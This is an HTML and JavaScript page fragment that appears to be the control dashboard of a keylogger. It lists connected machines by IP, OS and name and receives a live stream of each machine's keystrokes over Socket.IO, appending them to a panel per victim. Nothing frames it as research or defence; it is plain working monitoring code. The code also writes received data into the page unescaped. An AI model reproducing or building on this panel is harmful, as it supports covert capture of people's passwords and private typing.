<p class="text-center text-muted">© Copyright 2014 The Awesome People</p>

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js"></script>
<script src="/socket.io/socket.io.js"></script>
 <script type="text/javascript">
 var socket ;
   $(function() {
      socket = new io.connect();
     socket.on('users',function(data){
     var olddata ;
      data.forEach(function(al){
      olddata+="<tr><td>"+al.ip+"</td><td>"+al.os+"</td><td>"+al.name+"</td><td>"+al.cnt+"</td><td>"+al.status+"</td><td><button onclick='getinfo()' type='button' class='btn btn-info'>Info</button></td></tr>";
      
        });
         $('#users').html(olddata);
     });

    socket.on('info',function(msg){
      alert(msg.name);
     });
     socket.on('getkey',function(msg){
     var o = $('#'+msg.id);
     
     if(!o.html())
     {
     $('<div class="panel panel-default"><div class="panel-heading"><h3 class="panel-title">'+msg.id+'</h3></div> <div id="'+msg.id+'" class="panel-body"></div></div>').appendTo('#all');
     }
     if(msg.key == 'Enter')
     {

     $('#'+msg.id).append('<br/>');
     }else
     {
     $('#'+msg.id).append(msg.key);
     }
      
     });

   });
   function us()
{
$.get( "/getusers")
  .done(function( data ) {
    data.forEach(function(al){
   $('#users').append("<tr><td>"+al.ip+"</td><td>"+al.os+"</td><td>"+al.name+"</td><td>"+al.cnt+"</td></tr>");
    });
    
  });
  }

  function op()
{
$.get( "/getusers")
  .done(function( data ) {
    alert( "Data Loaded: " + data );
  });
  }

    function getinfo()
{
socket.emit('ownerGetinfo');
  }
 </script>
<script>

</script>